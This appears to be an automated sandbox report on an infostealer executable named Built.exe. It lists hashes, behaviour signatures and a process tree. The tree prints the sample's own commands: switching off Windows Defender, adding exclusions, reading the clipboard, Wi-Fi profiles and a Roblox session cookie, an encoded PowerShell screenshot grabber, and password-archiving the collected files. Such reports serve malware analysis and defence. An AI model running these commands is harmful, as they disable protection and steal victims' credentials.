Analysis

  • max time kernel
    3s
  • max time network
    4s
  • platform
    windows11-21h2_x64
  • resource
    win11-20241007-en
  • resource tags

    arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    15-10-2024 23:45

General

  • Target

    Built.exe

  • Size

    6.9MB

  • MD5

    a1c4cb6f9489c0a743fd2c91c68b5aee

  • SHA1

    100bacc54bef11c240c58e89a95d9e9ef39eea4f

  • SHA256

    83615ffc8b2c315f32d61ad1c8ca42541e0a9c9864d68a97446d532572edf323

  • SHA512

    7f1e8e4227e259fdbef91db0e13d0429ce30e5ae39ec82d0e67d60d352df987ddcb2597d9179de43fd4527765df6d70d6801d3e5c7a1fd9821c0927a7d5f14cf

  • SSDEEP

    98304:e3DjWM8JEE1r5uamaHl3Ne4i3Tf2PkOpfW9hZMMoVmkzhxIdfXeRpYKJJcGhEIFw:e30p3eNTfm/pf+xk4dWRptrbWOjgrL

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Using powershell.exe command.

  • Drops file in Drivers directory 3 IoCs
  • Clipboard Data 1 TTPs 2 IoCs

    Adversaries may collect data stored in the clipboard from users copying information within or between applications.

  • Loads dropped DLL 17 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Enumerates processes with tasklist 1 TTPs 4 IoCs
  • UPX packed file 39 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

    Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Suspicious behavior: EnumeratesProcesses 13 IoCs
  • Suspicious use of AdjustPrivilegeToken 51 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 2 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Built.exe
    "C:\Users\Admin\AppData\Local\Temp\Built.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4404
    • C:\Users\Admin\AppData\Local\Temp\Built.exe
      "C:\Users\Admin\AppData\Local\Temp\Built.exe"
      2⤵
      • Drops file in Drivers directory
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:2748
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Built.exe'"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2780
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Built.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:920
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3076
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2096
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‌   .scr'"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:444
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‌   .scr'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4608
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:976
        • C:\Windows\system32\tasklist.exe
          tasklist /FO LIST
          4⤵
          • Enumerates processes with tasklist
          • Suspicious use of AdjustPrivilegeToken
          PID:3104
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:696
        • C:\Windows\system32\tasklist.exe
          tasklist /FO LIST
          4⤵
          • Enumerates processes with tasklist
          • Suspicious use of AdjustPrivilegeToken
          PID:4692
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3160
        • C:\Windows\System32\Wbem\WMIC.exe
          WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:2360
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
        3⤵
        • Clipboard Data
        • Suspicious use of WriteProcessMemory
        PID:756
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell Get-Clipboard
          4⤵
          • Clipboard Data
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4168
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4496
        • C:\Windows\system32\tasklist.exe
          tasklist /FO LIST
          4⤵
          • Enumerates processes with tasklist
          • Suspicious use of AdjustPrivilegeToken
          PID:3036
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
        3⤵
        • System Network Configuration Discovery: Wi-Fi Discovery
        • Suspicious use of WriteProcessMemory
        PID:1984
        • C:\Windows\system32\netsh.exe
          netsh wlan show profile
          4⤵
          • Event Triggered Execution: Netsh Helper DLL
          • System Network Configuration Discovery: Wi-Fi Discovery
          PID:3832
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3664
        • C:\Windows\system32\tree.com
          tree /A /F
          4⤵
            PID:3468
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "systeminfo"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:4436
          • C:\Windows\system32\systeminfo.exe
            systeminfo
            4⤵
            • Gathers system information
            PID:4616
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:3884
          • C:\Windows\system32\reg.exe
            REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
            4⤵
              PID:2464
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:3872
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
              4⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:4160
              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\c5knwnq2\c5knwnq2.cmdline"
                5⤵
                  PID:1436
                  • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8906.tmp" "c:\Users\Admin\AppData\Local\Temp\c5knwnq2\CSC5615FE36D8C04E4E82B9C9989F2B3C68.TMP"
                    6⤵
                      PID:3620
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "tree /A /F"
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:3708
                • C:\Windows\system32\tree.com
                  tree /A /F
                  4⤵
                    PID:1528
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c "tree /A /F"
                  3⤵
                  • Suspicious use of WriteProcessMemory
                  PID:1396
                  • C:\Windows\system32\tree.com
                    tree /A /F
                    4⤵
                      PID:3820
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
                    3⤵
                      PID:872
                      • C:\Windows\system32\attrib.exe
                        attrib -r C:\Windows\System32\drivers\etc\hosts
                        4⤵
                        • Drops file in Drivers directory
                        • Views/modifies file attributes
                        PID:1496
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /c "tree /A /F"
                      3⤵
                        PID:2488
                        • C:\Windows\system32\tree.com
                          tree /A /F
                          4⤵
                            PID:5016
                        • C:\Windows\system32\cmd.exe
                          C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
                          3⤵
                            PID:2204
                            • C:\Windows\system32\attrib.exe
                              attrib +r C:\Windows\System32\drivers\etc\hosts
                              4⤵
                              • Drops file in Drivers directory
                              • Views/modifies file attributes
                              PID:1228
                          • C:\Windows\system32\cmd.exe
                            C:\Windows\system32\cmd.exe /c "tree /A /F"
                            3⤵
                              PID:1872
                              • C:\Windows\system32\tree.com
                                tree /A /F
                                4⤵
                                  PID:4232
                              • C:\Windows\system32\cmd.exe
                                C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                3⤵
                                  PID:4380
                                  • C:\Windows\system32\tasklist.exe
                                    tasklist /FO LIST
                                    4⤵
                                    • Enumerates processes with tasklist
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:4628
                                • C:\Windows\system32\cmd.exe
                                  C:\Windows\system32\cmd.exe /c "tree /A /F"
                                  3⤵
                                    PID:464
                                    • C:\Windows\system32\tree.com
                                      tree /A /F
                                      4⤵
                                        PID:3348
                                    • C:\Windows\system32\cmd.exe
                                      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                      3⤵
                                        PID:712
                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                          4⤵
                                          • Command and Scripting Interpreter: PowerShell
                                          PID:1544
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                        3⤵
                                          PID:4064
                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                            4⤵
                                              PID:1920
                                          • C:\Windows\system32\cmd.exe
                                            C:\Windows\system32\cmd.exe /c "getmac"
                                            3⤵
                                              PID:5016
                                              • C:\Windows\System32\Conhost.exe
                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                4⤵
                                                  PID:2488
                                                • C:\Windows\system32\getmac.exe
                                                  getmac
                                                  4⤵
                                                    PID:920
                                                • C:\Windows\system32\cmd.exe
                                                  C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI44042\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\Qumrv.zip" *"
                                                  3⤵
                                                    PID:1488
                                                    • C:\Users\Admin\AppData\Local\Temp\_MEI44042\rar.exe
                                                      C:\Users\Admin\AppData\Local\Temp\_MEI44042\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\Qumrv.zip" *
                                                      4⤵
                                                        PID:1872
                                                    • C:\Windows\system32\cmd.exe
                                                      C:\Windows\system32\cmd.exe /c "wmic os get Caption"
                                                      3⤵
                                                        PID:4236

                                                  Network

                                                  MITRE ATT&CK Enterprise v15

                                                  Replay Monitor

                                                  Loading Replay Monitor...

                                                  Downloads

                                                  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                    Filesize

                                                    2KB

                                                    MD5

                                                    627073ee3ca9676911bee35548eff2b8

                                                    SHA1

                                                    4c4b68c65e2cab9864b51167d710aa29ebdcff2e

                                                    SHA256

                                                    85b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c

                                                    SHA512

                                                    3c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb

                                                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                    Filesize

                                                    944B

                                                    MD5

                                                    6903d57eed54e89b68ebb957928d1b99

                                                    SHA1

                                                    fade011fbf2e4bc044d41e380cf70bd6a9f73212

                                                    SHA256

                                                    36cbb00b016c9f97645fb628ef72b524dfbdf6e08d626e5c837bbbb9075dcb52

                                                    SHA512

                                                    c192ea9810fd22de8378269235c1035aa1fe1975a53c876fe4a7acc726c020f94773c21e4e4771133f9fcedb0209f0a5324c594c1db5b28fe1b27644db4fdc9e

                                                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                    Filesize

                                                    944B

                                                    MD5

                                                    7d760ca2472bcb9fe9310090d91318ce

                                                    SHA1

                                                    cb316b8560b38ea16a17626e685d5a501cd31c4a

                                                    SHA256

                                                    5c362b53c4a4578d8b57c51e1eac15f7f3b2447e43e0dad5102ecd003d5b41d4

                                                    SHA512

                                                    141e8661d7348ebbc1f74f828df956a0c6e4cdb70f3b9d52623c9a30993bfd91da9ed7d8d284b84f173d3e6f47c876fb4a8295110895f44d97fd6cc4c5659c35

                                                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                    Filesize

                                                    1KB

                                                    MD5

                                                    57c194f586803579676120e2c0acaed4

                                                    SHA1

                                                    9e28d59ff243dabad248f8fa2103c2eb1a857cc2

                                                    SHA256

                                                    b36ea640959ad1d25bac8b246172e1342e68ada5847497b2c57a276d2920d4eb

                                                    SHA512

                                                    419a630b0342cf9f60f4fe3a5578d984ce85eb987c6c7ead0bf0d0ae687f042bcdea81a0d063f7e352ddbb12ca5eda9f603cabdc671efd67e31c126a80646923

                                                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                    Filesize

                                                    1KB

                                                    MD5

                                                    0ac871344dc49ae49f13f0f88acb4868

                                                    SHA1

                                                    5a073862375c7e79255bb0eab32c635b57a77f98

                                                    SHA256

                                                    688f15b59a784f6f4c62554f00b5d0840d1489cef989c18126c70dfee0806d37

                                                    SHA512

                                                    ace5c50303bd27998607cf34ac4322bcf5edfbd19bbb24309acf4d037b6f3f7636c7c14b6ac0b924114e036252d3a1b998951c7068f41548728fa5d92f5f9006

